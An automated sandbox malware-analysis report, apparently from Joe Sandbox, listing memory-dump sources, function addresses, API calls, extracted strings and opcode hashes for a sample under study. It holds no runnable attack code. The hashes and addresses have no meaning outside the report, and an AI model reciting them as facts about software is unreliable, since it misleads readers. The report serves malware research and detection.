Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 5a99bf4820d74fcaada500b1065b72cb3ab3c1cf67b7ad9e201b66daab51bda1
Instruction ID: 0abfbcd1bda35fa5bb5356527800346ef817b6d53fb485a4bf206d2cde0ed5d7
Opcode Fuzzy Hash: 5a99bf4820d74fcaada500b1065b72cb3ab3c1cf67b7ad9e201b66daab51bda1
Instruction Fuzzy Hash: 02110A70244205AFDF40CF64D888FBA33A9AF89750F10D448F9198B250DB79E841EB62

Function 6CBF85F0 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CBF8C7C
__aulldiv.LIBCMT ref: 6CBF8DD7

Strings

gle.com.google.com *.mn 1.google.com.google.com *.lb 1.google.com.google.com *.es 1.google.com.google.com *.org 1.google.com.google.com *.uk 1.google.com.google.com *.ug 1.google.com.google.com , xrefs: 6CBF8790, 6CBF8A47

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: __aulldiv
String ID: gle.com.google.com *.mn 1.google.com.google.com *.lb 1.google.com.google.com *.es 1.google.com.google.com *.org 1.google.com.google.com *.uk 1.google.com.google.com *.ug 1.google.com.google.com
API String ID: 3732870572-3360750626
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: 9b62ee702330004cfc0a28459958fbd4cd42efa33701894fa3427a81fba8b11e
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: 8E329031F001598BDF18CE9DC8A17AEF7B2FB89300F15813AD516BB790DA359D4A8B91

Function 00B26DBB Relevance: 5.4, Strings: 3, Instructions: 1629COMMON

Download Yara Rule

Strings

XDW_, xrefs: 00B2703C
rVo, xrefs: 00B2784E
8<, xrefs: 00B278DD

Memory Dump Source

Source File: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID: XDW_$rVo$8<
API String ID: 0-939132908
Opcode ID: dce7c7c87b26cdd5306869b03596b373c509b413bf2e8b2f36057d2e48cdee99
Instruction ID: f7c83b514342002d043b409be9efc5cd132149c16627cf2a0e1e80727a1d0696
Opcode Fuzzy Hash: dce7c7c87b26cdd5306869b03596b373c509b413bf2e8b2f36057d2e48cdee99
Instruction Fuzzy Hash: 89B238F3A0C2109FE3046E2DEC8567ABBE5EF94320F1A493DEAC5C3744EA7558058697

Function 6CBD6CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6CBD6D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CBD6E1E

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: 4ecfb03c3da924235e2ba2d0bbbb42e7d2fbe00fe7b1bbc4da9a6631ffd1a6e8
Instruction ID: 707e0b2e2c77ff4a0659d25a230e74963caf295de26a2b7acbad666ed08b15ce
Opcode Fuzzy Hash: 4ecfb03c3da924235e2ba2d0bbbb42e7d2fbe00fe7b1bbc4da9a6631ffd1a6e8
Instruction Fuzzy Hash: F1A158706187818FDB15CF25C490BAEBBE2FF89308F45495DE88A87751DB70B849CB92

Function 00773720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0077E118,00000000,00000001,0077E108,00000000), ref: 00773758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 007737B0

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: 1d2e4de8436a2ec54ae8d61c89ed8181b2a3523610eb4ba58c57fc5ca1f3cbc6
Instruction ID: 6f7b1a664250e1d4229de480956cc22e2e90e340d0814770b8ef1f0778142497
Opcode Fuzzy Hash: 1d2e4de8436a2ec54ae8d61c89ed8181b2a3523610eb4ba58c57fc5ca1f3cbc6
Instruction Fuzzy Hash: 98410970A40A289FDB24DB58CC99B9BB7B4BB48702F4081D8E618EB2D0D7716E85CF51

Function 00B28921 Relevance: 4.2, Strings: 2, Instructions: 1650COMMON

Download Yara Rule

Strings

epO^, xrefs: 00B29794
ck_\, xrefs: 00B29B73

Memory Dump Source

Source File: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ck_\$epO^
API String ID: 0-936217964
Opcode ID: de836c79d6735fd7462fd130a70f47549a8cc4c1ebe4e398b3df895154e89f7d
Instruction ID: ecb57fafbf7a2a0e4bb6c4806bed36bd91a160e1d4d380c8660e09cb2753be0e
Opcode Fuzzy Hash: de836c79d6735fd7462fd130a70f47549a8cc4c1ebe4e398b3df895154e89f7d
Instruction Fuzzy Hash: B1B23AF3A082049FE3046E2DEC8567ABBE9EF94720F1A493DEAC4C3744E97558058797

Function 00B344FE Relevance: 4.0, Strings: 2, Instructions: 1467COMMON

Download Yara Rule

Strings

"_m, xrefs: 00B34CB9
+L8^, xrefs: 00B35231

Memory Dump Source

Source File: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID: "_m$+L8^
API String ID: 0-1128789949
Opcode ID: 58707d1d02af2e81c971ebcdf16e08c6383c2e06bfb53a96c1b874644aae4090
Instruction ID: c3c8f0b04871ea89b5ecc4a40f6ef5d8381fa531e775c42def4bb8fdd0f95185
Opcode Fuzzy Hash: 58707d1d02af2e81c971ebcdf16e08c6383c2e06bfb53a96c1b874644aae4090
Instruction Fuzzy Hash: 63A2D4F350C204AFE7046E29EC8567AFBE9EF94720F16493DEAC4C3740EA7598418697

Function 00B37E15 Relevance: 3.6, Strings: 2, Instructions: 1148COMMON

Download Yara Rule

Strings

MQ}[, xrefs: 00B38578
L[~s, xrefs: 00B38B61

Memory Dump Source

Source File: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID: L[~s$MQ}[
API String ID: 0-2976587088
Opcode ID: 941a8d550c4221d4a421c1525cf2e0fd6e01d273eee146b20b62e16b3b56c5df
Instruction ID: 1d61773a0913f76097c27ec2828b227e1fbaa6a7054ce0fc48c3f64030c734ee
Opcode Fuzzy Hash: 941a8d550c4221d4a421c1525cf2e0fd6e01d273eee146b20b62e16b3b56c5df
Instruction Fuzzy Hash: 3772D4F36086049FE304AE1DEC8566AFBE9EF94720F1A493DEAC5C3740E63598418797

Function 6CBD5C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6CBA4A63,?,?), ref: 6CBD5F06

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 0ce94df670519611ff690651a9efd00088042dd72f2f8afb38c22e535640dfe3
Instruction ID: b5feeed78de547bb50af375e51212d95b7a835c980a1fa013ecfc8f2b19c8c98
Opcode Fuzzy Hash: 0ce94df670519611ff690651a9efd00088042dd72f2f8afb38c22e535640dfe3
Instruction Fuzzy Hash: 28C1D1B5D012998FCB04CF99C1906EEBBB2FF89318F29415DC8556BB44D732B809CB95

Function 00A4E3FA Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

cb, xrefs: 00A4E561

Memory Dump Source

Source File: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID: cb
API String ID: 0-157133964
Opcode ID: 1a528c2b0cdb9be02eb37f8e5dd0998deef330bb044a7e2a4d2e115a1defe03a
Instruction ID: b560f8618f636c13ba15be6f99a3be04b4d0c87ea5803841e53c91c1d8b6470d
Opcode Fuzzy Hash: 1a528c2b0cdb9be02eb37f8e5dd0998deef330bb044a7e2a4d2e115a1defe03a
Instruction Fuzzy Hash: F641E8F3E087109FF304AD69ECC57A6B7D6EB94321F1A863DDA8893784E935580046C6

Function 6CC0AC00 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID:
String ID:
